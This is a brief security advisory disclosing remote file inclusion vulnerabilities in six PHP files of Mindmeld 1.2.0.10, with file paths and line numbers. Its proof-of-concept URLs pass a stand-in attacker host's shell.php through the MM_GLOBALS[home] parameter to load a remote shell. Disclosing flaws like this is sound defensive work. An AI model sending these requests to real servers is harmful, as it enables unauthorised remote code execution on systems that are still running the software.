Mindmeld Remote File Inclusion Vulnerabilities
Mindmeld is an enterprise-capable knowledge-sharing system written in PHP. There are multiple remote file inclusion vulnerabilities in Mindmeld version 1.2.0.10 (latest version). The vulnerable files and lines are Mindmeld-1.2.0.10/acweb/admin_index.php: line 51, Mindmeld-1.2.0.10/include/ask.inc.php: line 34, Mindmeld-1.2.0.10/include/learn.inc.php: line 38, Mindmeld-1.2.0.10/include/manage.inc.php: line 31, Mindmeld-1.2.0.10/include/mind.inc.php: line 33, Mindmeld-1.2.0.10/include/sensory.inc.php: line 70. The PoC for each of these vulnerabilities is http://server/mindmeld/acweb/admin_index.php?MM_GLOBALS[home]=http://shell_server/shell.php?, http://server/mindmeld/include/ask.inc.php?MM_GLOBALS[home]=http://shell_server/shell.php?, http://server/mindmeld/include/learn.inc.php?MM_GLOBALS[home]=http://shell_server/shell.php?, http://server/mindmeld/include/manage.inc.php?MM_GLOBALS[home]=http://shell_server/shell.php?, http://server/mindmeld/include/mind.inc.php?MM_GLOBALS[home]=http://shell_server/shell.php?, http://server/mindmeld/include/sensory.inc.php?MM_GLOBALS[home]=http://shell_server/shell.php? respectively. These vulnerabilities have been disclosed to the vendor although development on this software has been discontinued.